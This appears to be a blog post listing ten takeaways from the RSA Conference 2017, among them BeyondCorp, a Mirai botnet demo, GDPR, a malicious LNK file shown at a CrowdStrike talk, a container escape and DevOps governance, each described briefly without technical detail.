RSA conference 2017 is over and a ton of roundups are being written, so here's mine. As expected, the hottest security topics and vendors were related to IoT and the cloud. Additionally, Threat intelligence and SOCs were the subject of conservation with many vendors on the floor. Below are my top 10 key takeaways:
1. CSA Summit: The Summit was the day before RSA and the key theme throughout the day were levels of trust: identities, devices and roles. But the biggest takeaway was the release of the publication from the Software Defined Perimeter (SDP) Working Group, exploring how the SDP can be applied to Infrastructure-as-a-Service environments. Download your copy here.
2. Google’s BeyondCorp: Google has reinvented its security perimeter around devices through its groundbreaking “BeyondCorp” initiative. They introduced three core principles:
- Connecting from a particular network must not determine which services you can access.
- Access to services is granted based on what we know about you and your device.
- All access to services must be authenticated, authorized and encrypted.
3. Mirai Botnet: Chris Young of Intel Security, in an opening keynote, showed us how McAfee researchers bought an “off-the-shelf” DVR known to be targeted by Mirai Bonet. Within 60 seconds of connecting it to the Internet, the device was compromised. His keynote can be seen here.
4. Cryptographer’s Panel: Adi Shamir, the “S” in RSA, stated "I'm skeptical that Artificial Intelligence (AI) will have much of an impact on security… If you talk about 15 years from now, when AI systems are going to be super intelligent, I can foresee when you give all of the information about cybersecurity to the AI and it will think about it and then say, in a very calm voice, In order to save the internet, I'll have to kill it.” To view the panel talk go here.
5. SANS: Four SANS experts took the main stage to talk about the seven most dangerous cyberattacks. Some notable items were: Software developers are not properly validating remote network services they are utilizing and the Internet Storm Center is seeing continuous scanning for vulnerable "nosql" databases. Lastly, there are folks still not changing default passwords. Go here to view the talk.
6. GDPR: General Data Protection Regulation (GDPR) was discussed in a few talks. At a very high level, it states organizations must know what data they have and understand the risk that it poses. Johannes Ulrich, SANS Institute, advised that tokenization for data protection is the best answer. May 2018 is the deadline for companies to adhere to the regulation before they potentially face fines for noncompliance.
7. Hacking Exposed: The Hacking Exposed presentations by the CrowdStrike folks never disappoint, and this year they featured “Real-World Tradecraft of Bears, Pandas and Kittens.” My favorite hack they demonstrated was the malicious LNK file. This was embedded PowerShell and Payload inside of a Windows shortcut file (LNK). The full presentation is posted here.
8. Containers: If you are into Containers, Tsvi Korren of Aqua showed us how he jumped out of a Container. If you are wondering what is a container, it’s a form of application deployment that makes a process tree "think" that it has a complete operating system for itself.
9. Microsoft: Brad Smith of Microsoft noted that 74% of businesses expect to be breached this year and that 90% of intrusions begin with a phishing email. He stated, “every company has at least one person who will click on anything.”
10. DevOps: Josh Corman of Cyber Statecraft Initiative pointed out the need for governance in DevOps. To get his message out he used a great analogy: In the span of two months, two massive earthquakes struck Haiti and Chile. The Haiti earthquake resulted in the loss of 230,000 lives but the more powerful one hit Chile and resulted in the deaths Why is that? Chile planned for disaster by having a robust set of building codes. Haiti has no apparent building code.